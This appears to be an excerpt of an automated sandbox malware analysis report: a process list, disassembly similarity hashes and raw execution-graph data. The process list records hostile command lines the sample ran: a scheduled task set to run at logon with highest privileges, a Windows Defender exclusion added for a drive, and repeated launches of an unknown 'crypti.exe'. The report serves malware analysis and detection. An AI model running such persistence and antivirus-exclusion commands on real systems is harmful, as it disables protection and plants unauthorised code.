                                                                                          Target ID:66
                                                                                          Start time:06:41:49
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:68
                                                                                          Start time:06:41:49
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                          Imagebase:0x7ff78f510000
                                                                                          File size:235'008 bytes
                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:69
                                                                                          Start time:06:41:52
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:70
                                                                                          Start time:06:41:52
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:71
                                                                                          Start time:06:41:52
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:powershell -Command Add-MpPreference -ExclusionPath 'F:\'
                                                                                          Imagebase:0x7ff6e3d50000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:74
                                                                                          Start time:06:42:19
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:75
                                                                                          Start time:06:42:19
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:76
                                                                                          Start time:06:42:19
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\crypti.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"c:\windows\system32\crypti.exe"
                                                                                          Imagebase:0x7ff60cc80000
                                                                                          File size:643'072 bytes
                                                                                          MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:81
                                                                                          Start time:06:42:30
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:82
                                                                                          Start time:06:42:31
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:83
                                                                                          Start time:06:42:31
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\crypti.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"c:\windows\system32\crypti.exe"
                                                                                          Imagebase:0x7ff7d6eb0000
                                                                                          File size:643'072 bytes
                                                                                          MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:84
                                                                                          Start time:06:42:43
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:85
                                                                                          Start time:06:42:43
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:86
                                                                                          Start time:06:42:43
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\crypti.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"c:\windows\system32\crypti.exe"
                                                                                          Imagebase:0x7ff7a51c0000
                                                                                          File size:643'072 bytes
                                                                                          MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:88
                                                                                          Start time:06:42:56
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:89
                                                                                          Start time:06:42:56
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:90
                                                                                          Start time:06:42:56
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\crypti.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"c:\windows\system32\crypti.exe"
                                                                                          Imagebase:0x7ff670930000
                                                                                          File size:643'072 bytes
                                                                                          MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:91
                                                                                          Start time:06:43:07
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:92
                                                                                          Start time:06:43:07
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Target ID:93
                                                                                          Start time:06:43:07
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\crypti.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"c:\windows\system32\crypti.exe"
                                                                                          Imagebase:0x7ff77ee70000
                                                                                          File size:643'072 bytes
                                                                                          MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2380118265.00007FF668321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668320000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2380098241.00007FF668320000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2385249072.00007FF669195000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2385294712.00007FF669198000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff668320000_pyld611114.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                            • String ID:
                                                                                            • API String ID: 2933794660-0
                                                                                            • Opcode ID: 4c1b95cfeb29d36a2191ca800c4b776805e3dc359a3975e0c0840d805d58c9f8
                                                                                            • Instruction ID: 0b1857b68c40985531f14c1adb512e27c0571ee40951b8298e185759250633f4
                                                                                            • Opcode Fuzzy Hash: 4c1b95cfeb29d36a2191ca800c4b776805e3dc359a3975e0c0840d805d58c9f8
                                                                                            • Instruction Fuzzy Hash: 3C110632B14B058AEB008FB0E8552A833B4FB59758F480E35EE6D9A7A4DF78D1688240
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.2457592268.00007FF792961000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF792960000, based on PE: true
                                                                                            • Associated: 0000000C.00000002.2457510985.00007FF792960000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 0000000C.00000002.2457655887.00007FF793394000.00000002.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 0000000C.00000002.2459654860.00007FF793760000.00000004.00000001.01000000.00000006.sdmp
                                                                                            • Associated: 0000000C.00000002.2459680036.00007FF793763000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_7ff792960000_usvcinsta64.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                            • String ID:
                                                                                            • API String ID: 2933794660-0
                                                                                            • Opcode ID: 708b7739343b0ed83ac0f76d64139286e1ea8fe78b9a00fa0674ff42a1f590b5
                                                                                            • Instruction ID: 866c1776324f9fdca93dc36fb4fa3defe7fa490696dae065aa37e331154e2075
                                                                                            • Opcode Fuzzy Hash: 708b7739343b0ed83ac0f76d64139286e1ea8fe78b9a00fa0674ff42a1f590b5
                                                                                            • Instruction Fuzzy Hash: FB119E26B08F0589FB50EF70E8542B873A8F728728F841E31DA6D927A8DF78D058C350

                                                                                            Execution Graph

                                                                                            Execution Coverage:34.4%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:34.2%
                                                                                            Total number of Nodes:73
                                                                                            Total number of Limit Nodes:2

                                                                                            Callgraph

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2552580244.00007FF63F421000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63F420000, based on PE: true
                                                                                            • Associated: 0000001B.00000002.2552554419.00007FF63F420000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 0000001B.00000002.2552606972.00007FF63F422000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 0000001B.00000002.2552632237.00007FF63F424000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_27_2_7ff63f420000_printui.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastValue$CloseCreateDeleteLibraryLoadQueryWindow$AddressClassCommandCursorDestroyFreeHeapInformationLineObjectOpenProcRegisterStock
                                                                                            • String ID: PrintUIEntryW$Software\Microsoft\Windows\CurrentVersion\PrinterInstallation$StubPrintWindow$UIEntry$printui.dll
                                                                                            • API String ID: 2613610799-4035671587
                                                                                            • Opcode ID: e89becaa4b4c2da40ab99fedc63f44ed43bcaaa6e32622ee94d5cb7eade183ba
                                                                                            • Instruction ID: 08a0577a2ce127371488fd4a382e8509062a82fcb335b25226be4f052ff20d90
                                                                                            • Opcode Fuzzy Hash: e89becaa4b4c2da40ab99fedc63f44ed43bcaaa6e32622ee94d5cb7eade183ba
                                                                                            • Instruction Fuzzy Hash: 4CA14932A18A46DAFB148B60E4447BDBBA0FB89B89F825131DA0ED3B56CF3DD105D700

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2552580244.00007FF63F421000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63F420000, based on PE: true
                                                                                            • Associated: 0000001B.00000002.2552554419.00007FF63F420000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 0000001B.00000002.2552606972.00007FF63F422000.00000002.00000001.01000000.00000009.sdmp
                                                                                            • Associated: 0000001B.00000002.2552632237.00007FF63F424000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_27_2_7ff63f420000_printui.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_cexit_inittermexit
                                                                                            • String ID:
                                                                                            • API String ID: 642454821-0
                                                                                            • Opcode ID: d036f23a73c2ceeb0dc0bbf8eea258f05a7f4c7e4edc28ade6a86160fbf4be78
                                                                                            • Instruction ID: f8084711b117ef1393431087eb47b2af3cc2f574408e91d5827a7f5f0d9bb590
                                                                                            • Opcode Fuzzy Hash: d036f23a73c2ceeb0dc0bbf8eea258f05a7f4c7e4edc28ade6a86160fbf4be78
                                                                                            • Instruction Fuzzy Hash: A3613825A08646A2F7689B11E54063933A1FF94B84F564135DA4DD33A7EF3FE981E700

                                                                                             Control-flow Graph
                                                                                             control_flow_graph 75 7ff63f421520-7ff63f421568 __wgetmainargs
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2552580244.00007FF63F421000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63F420000, based on PE: true
                                                                                             • Associated: 0000001B.00000002.2552554419.00007FF63F420000.00000002.00000001.01000000.00000009.sdmp
                                                                                             • Associated: 0000001B.00000002.2552606972.00007FF63F422000.00000002.00000001.01000000.00000009.sdmp
                                                                                             • Associated: 0000001B.00000002.2552632237.00007FF63F424000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_27_2_7ff63f420000_printui.jbxd
                                                                                            Similarity
                                                                                            • API ID: __wgetmainargs
                                                                                            • String ID:
                                                                                            • API String ID: 1709950718-0
                                                                                            • Opcode ID: fb17b9cf0bb6e0d9112bc9002bd240893ebb992b9e28e092c31673401121c9b0
                                                                                            • Instruction ID: 6771286895df8d00f48c75d9af292fd4d667410646f8a41d7b1cd9f018eb0a42
                                                                                            • Opcode Fuzzy Hash: fb17b9cf0bb6e0d9112bc9002bd240893ebb992b9e28e092c31673401121c9b0
                                                                                            • Instruction Fuzzy Hash: 2EE07574E09647F6EA18CB10E8405B47770BB05744F820032C50DD332BFE3EA209EB24

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2552580244.00007FF63F421000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63F420000, based on PE: true
                                                                                             • Associated: 0000001B.00000002.2552554419.00007FF63F420000.00000002.00000001.01000000.00000009.sdmp
                                                                                             • Associated: 0000001B.00000002.2552606972.00007FF63F422000.00000002.00000001.01000000.00000009.sdmp
                                                                                             • Associated: 0000001B.00000002.2552632237.00007FF63F424000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_27_2_7ff63f420000_printui.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled$CurrentProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1249254920-0
                                                                                            • Opcode ID: 67a69430592ab0ed5dfc45027a236bc3dcce14c44e9d99ca36710f20fe33c88e
                                                                                            • Instruction ID: 8c7a4c2c3aee81f9b0e3b3369100e02693b338bef424c7b9402ae5663793add4
                                                                                            • Opcode Fuzzy Hash: 67a69430592ab0ed5dfc45027a236bc3dcce14c44e9d99ca36710f20fe33c88e
                                                                                            • Instruction Fuzzy Hash: E7D0C965E08A0B96FB5C1B62AC158351320BF5CB45F171034CB2BC6363DD7E9686A300

                                                                                             Control-flow Graph
                                                                                             control_flow_graph 150 7ff63f421880-7ff63f421897 SetUnhandledExceptionFilter
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2552580244.00007FF63F421000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63F420000, based on PE: true
                                                                                             • Associated: 0000001B.00000002.2552554419.00007FF63F420000.00000002.00000001.01000000.00000009.sdmp
                                                                                             • Associated: 0000001B.00000002.2552606972.00007FF63F422000.00000002.00000001.01000000.00000009.sdmp
                                                                                             • Associated: 0000001B.00000002.2552632237.00007FF63F424000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_27_2_7ff63f420000_printui.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                            • String ID:
                                                                                            • API String ID: 3192549508-0
                                                                                            • Opcode ID: 485700f28bb7499bc39e10582eb089dbe9317f5a288f74151dbe7ec09ee2bb63
                                                                                            • Instruction ID: 20b72fe0d2055bbc0e989bf6976da139502f6a31cf9524fa8a7efebd1c7734f8
                                                                                            • Opcode Fuzzy Hash: 485700f28bb7499bc39e10582eb089dbe9317f5a288f74151dbe7ec09ee2bb63
                                                                                            • Instruction Fuzzy Hash: 1CB09214E25402E1E608AB219C950A113A07F98300FC20430C10DC1222DE1E929A9700

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2552580244.00007FF63F421000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63F420000, based on PE: true
                                                                                             • Associated: 0000001B.00000002.2552554419.00007FF63F420000.00000002.00000001.01000000.00000009.sdmp
                                                                                             • Associated: 0000001B.00000002.2552606972.00007FF63F422000.00000002.00000001.01000000.00000009.sdmp
                                                                                             • Associated: 0000001B.00000002.2552632237.00007FF63F424000.00000002.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_27_2_7ff63f420000_printui.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                            • String ID:
                                                                                            • API String ID: 4104442557-0
                                                                                            • Opcode ID: 620f975a63dfef7962d64ab17e7f439f8fad081d60c42cdb74dd755226332b19
                                                                                            • Instruction ID: ae31891d86d4e7d5ef9aee78a152944218d0c4a1a8e033ed941a026b50ee1182
                                                                                            • Opcode Fuzzy Hash: 620f975a63dfef7962d64ab17e7f439f8fad081d60c42cdb74dd755226332b19
                                                                                            • Instruction Fuzzy Hash: ED115C22A04B459AEB04DF60EC442B833A4FB48758F410A31EA6DC775AEF7DD6A48340

                                                                                            Execution Graph

                                                                                            Execution Coverage:1.6%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:20%
                                                                                            Total number of Nodes:1583
                                                                                            Total number of Limit Nodes:49
strncmp 105234->105235 105237 7ffda3610c5a 105235->105237 105238 7ffda3610c3c 105235->105238 105239 7ffda3610c93 CRYPTO_free 105237->105239 105304 7ffda360fbb0 13 API calls 105237->105304 105303 7ffda360fbb0 13 API calls 105238->105303 105242 7ffda3610cad 105239->105242 105243 7ffda3610cb8 OPENSSL_sk_new_null 105239->105243 105242->105243 105245 7ffda3610cd0 OPENSSL_sk_num 105243->105245 105246 7ffda3610cc5 105243->105246 105244 7ffda3610c90 105244->105239 105247 7ffda3610d5a 105245->105247 105248 7ffda3610cdc 105245->105248 105246->105245 105250 7ffda3610d82 CRYPTO_free OPENSSL_sk_dup 105247->105250 105252 7ffda3610d6a OPENSSL_sk_push 105247->105252 105249 7ffda3610cf0 OPENSSL_sk_value 105248->105249 105251 7ffda3610d40 OPENSSL_sk_delete 105248->105251 105255 7ffda3610d0f OPENSSL_sk_push 105248->105255 105249->105248 105249->105251 105253 7ffda3610d33 OPENSSL_sk_free 105250->105253 105254 7ffda3610da7 OPENSSL_sk_free OPENSSL_sk_set_cmp_func OPENSSL_sk_sort OPENSSL_sk_free 105250->105254 105256 7ffda3610d4c OPENSSL_sk_num 105251->105256 105252->105247 105257 7ffda3610d1e CRYPTO_free 105252->105257 105253->105224 105254->105224 105255->105256 105255->105257 105256->105247 105256->105249 105257->105253 105260 7ffda361ef35 105259->105260 105305 7ffda3633f90 105260->105305 105262 7ffda361ef47 105263 7ffda3614676 105262->105263 105264 7ffda361ef4c ERR_set_mark OBJ_nid2sn EVP_MD_fetch ERR_pop_to_mark 105262->105264 105263->105099 105264->105263 105265->105112 105266->105119 105267->105119 105269 7ffda360bffa CRYPTO_THREAD_run_once 105268->105269 105269->105135 105271 7ffda361ee55 105270->105271 105276 7ffda3633f40 105271->105276 105273 7ffda361ee67 105274 7ffda361ee91 105273->105274 105275 7ffda361ee6c ERR_set_mark OBJ_nid2sn EVP_CIPHER_fetch ERR_pop_to_mark 105273->105275 105274->105138 105275->105274 105277 7ffda3633f50 105276->105277 105278 7ffda3633f85 105277->105278 105279 7ffda3633f6c ENGINE_finish 105277->105279 105278->105273 105279->105273 105281 7ffda368ee59 
105280->105281 105282 7ffda3614578 105281->105282 105283 7ffda368eea4 IsProcessorFeaturePresent 105281->105283 105282->105072 105282->105073 105284 7ffda368eebc 105283->105284 105289 7ffda368f098 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 105284->105289 105286 7ffda368eecf 105290 7ffda368ee70 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 105286->105290 105289->105286 105292 7ffda368edf0 105291->105292 105293 7ffda360ee05 OPENSSL_sk_new_null 105292->105293 105294 7ffda360ee83 105293->105294 105295 7ffda360ee1b 105293->105295 105294->105213 105296 7ffda360ee20 CONF_parse_list 105295->105296 105297 7ffda360ee95 OPENSSL_sk_free 105295->105297 105298 7ffda360ee4d ERR_new ERR_set_debug ERR_set_error OPENSSL_sk_free 105296->105298 105299 7ffda360ee41 OPENSSL_sk_num 105296->105299 105297->105213 105298->105294 105299->105297 105299->105298 105300->105214 105301->105227 105302->105230 105303->105237 105304->105244 105306 7ffda3633fa0 105305->105306 105307 7ffda3633fd5 105306->105307 105308 7ffda3633fbc ENGINE_finish 105306->105308 105307->105262 105308->105262 105309 7ffda376623e 105310 7ffda3766250 105309->105310 105313 7ffda3781530 105310->105313 105312 7ffda37660d8 105314 7ffda378155e 105313->105314 105323 7ffda3782780 105314->105323 105316 7ffda378156e 105317 7ffda377f210 2 API calls 105316->105317 105319 7ffda3781587 105316->105319 105318 7ffda37815d8 105317->105318 105318->105319 105320 7ffda37815eb 105318->105320 105319->105312 105346 7ffda373b3d0 calloc free free 105320->105346 105322 7ffda3781605 105322->105319 105324 7ffda37827cf 105323->105324 105344 7ffda37827f1 105324->105344 105347 7ffda3782360 calloc 105324->105347 105326 7ffda3782803 105327 7ffda378284c 105326->105327 105328 7ffda378283a _strdup 105326->105328 105326->105344 105329 7ffda378286a 105327->105329 105330 7ffda3782858 _strdup 105327->105330 105328->105327 105328->105344 105331 7ffda3782876 _strdup 105329->105331 105332 7ffda3782888 
105329->105332 105330->105329 105330->105344 105331->105332 105331->105344 105333 7ffda3782970 _strdup 105332->105333 105334 7ffda3782986 105332->105334 105332->105344 105333->105334 105333->105344 105335 7ffda378298f _strdup 105334->105335 105336 7ffda37829ae 105334->105336 105335->105336 105337 7ffda377f210 2 API calls 105336->105337 105336->105344 105342 7ffda3782bcb 105337->105342 105338 7ffda3782d9f 105340 7ffda3782db4 free free free free 105338->105340 105341 7ffda3782e58 free free free 105338->105341 105339 7ffda3782d4d free free 105339->105338 105340->105341 105343 7ffda3782eea 105341->105343 105342->105338 105342->105339 105342->105343 105343->105344 105355 7ffda3784cc0 105343->105355 105344->105316 105346->105322 105348 7ffda3782389 105347->105348 105349 7ffda3782508 105347->105349 105350 7ffda377f210 2 API calls 105348->105350 105349->105326 105351 7ffda37823e8 105350->105351 105352 7ffda3782539 105351->105352 105353 7ffda37824e5 _strdup 105351->105353 105352->105326 105353->105352 105354 7ffda37824f7 free free 105353->105354 105354->105349 105356 7ffda3784f30 calloc 105355->105356 105357 7ffda3784ceb 105355->105357 105362 7ffda3784f57 105356->105362 105358 7ffda3784d1f 105357->105358 105359 7ffda3784cf7 strncmp 105357->105359 105361 7ffda3784d45 105358->105361 105366 7ffda3784e0e 105358->105366 105359->105358 105360 7ffda3784d0e 105359->105360 105360->105356 105360->105358 105364 7ffda3784d4a _strdup 105361->105364 105363 7ffda3784fbf 105362->105363 105365 7ffda3784f9c free 105362->105365 105368 7ffda3784d77 105364->105368 105365->105363 105367 7ffda3784e33 _strdup 105366->105367 105367->105368 105369 7ffda3784e60 105367->105369 105368->105344 105369->105368 105370 7ffda377f210 2 API calls 105369->105370 105370->105368 105371 7ffda36d4e55 105376 7ffda36d3350 105371->105376 105373 7ffda36d4e8b 105375 7ffda36d4ea4 105373->105375 105386 7ffda36d67a0 105373->105386 105394 7ffda36da090 105376->105394 105378 7ffda36d336a 105378->105373 105381 7ffda36d3380 
